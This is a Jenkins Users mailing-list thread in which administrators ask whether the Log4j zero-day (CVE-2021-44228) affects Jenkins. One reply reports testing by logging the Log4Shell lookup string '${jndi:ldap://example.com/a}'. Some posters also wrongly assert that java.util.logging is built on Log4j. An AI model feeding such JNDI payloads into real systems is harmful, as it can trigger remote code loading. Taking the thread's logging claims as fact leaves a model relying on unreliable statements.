The good news is that passing the ${jndi:ldap://example.com/a} string
through the logger does not trigger the CVE behaviour.
On Sunday, December 12, 2021 at 11:44:35 a.m. UTC-5 [email protected]
wrote:
> Running the script:
> println(java.util.logging.Logger.class)
>
> does indicated that Apache logger (built on top of Log4j) is present in
> the LTS version of Jenkins.
>
> On Sunday, December 12, 2021 at 11:39:55 a.m. UTC-5 [email protected]
> wrote:
>
>> Hi Kritesh,
>>
>> Thank you for this info.
>>
>> The problem with that example is that Apache java.util.logging is built
>> on top of Log4j but does not identify as such. I am not convinced that this
>> test is sufficient.
>>
>> Sincerely,
>> Randall
>>
>> On Sunday, December 12, 2021 at 11:34:15 a.m. UTC-5 [email protected]
>> wrote:
>>
>>> I am following for the same issue… found below info on community page
>>> regarding this vulnerability.
>>>
>>> https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/
>>>
>>>
>>> Thanks & Regards,
>>> Kritesh
>>>
>>> On Sun, Dec 12, 2021 at 9:27 AM [email protected] <[email protected]>
>>> wrote:
>>>
>>>> Hi All,
>>>>
>>>> I am looking for any information relating to whether the Zero Days CVE
>>>> has any impact on Jenkins or Plugins. We do know that the
>>>> java.util.logging
>>>> is built on log4j, but do not know whether protections are in place to
>>>> prevent this vulnerability from being exploited, and where. For example,
>>>> could a command in a pipeline trigger this vulnerability.
>>>>
>>>> This is a somewhat urgent request.
>>>>
>>>> Thanks,
>>>> Randall
>>>>
>>>> --
>>>> You received this message because you are subscribed to the Google
>>>> Groups "Jenkins Users" group.
>>>> To unsubscribe from this group and stop receiving emails from it, send
>>>> an email to [email protected].
>>>> To view this discussion on the web visit
>>>> https://groups.google.com/d/msgid/jenkinsci-users/4e157a13-bfba-425a-81ae-b93cdd845f9dn%40googlegroups.com
>>>>
>>>> <https://groups.google.com/d/msgid/jenkinsci-users/4e157a13-bfba-425a-81ae-b93cdd845f9dn%40googlegroups.com?utm_medium=email&utm_source=footer>
>>>> .
>>>>
>>>
--
You received this message because you are subscribed to the Google Groups
"Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to [email protected].
To view this discussion on the web visit
https://groups.google.com/d/msgid/jenkinsci-users/4d97473c-e2c4-4927-97f1-d32769cffe10n%40googlegroups.com.
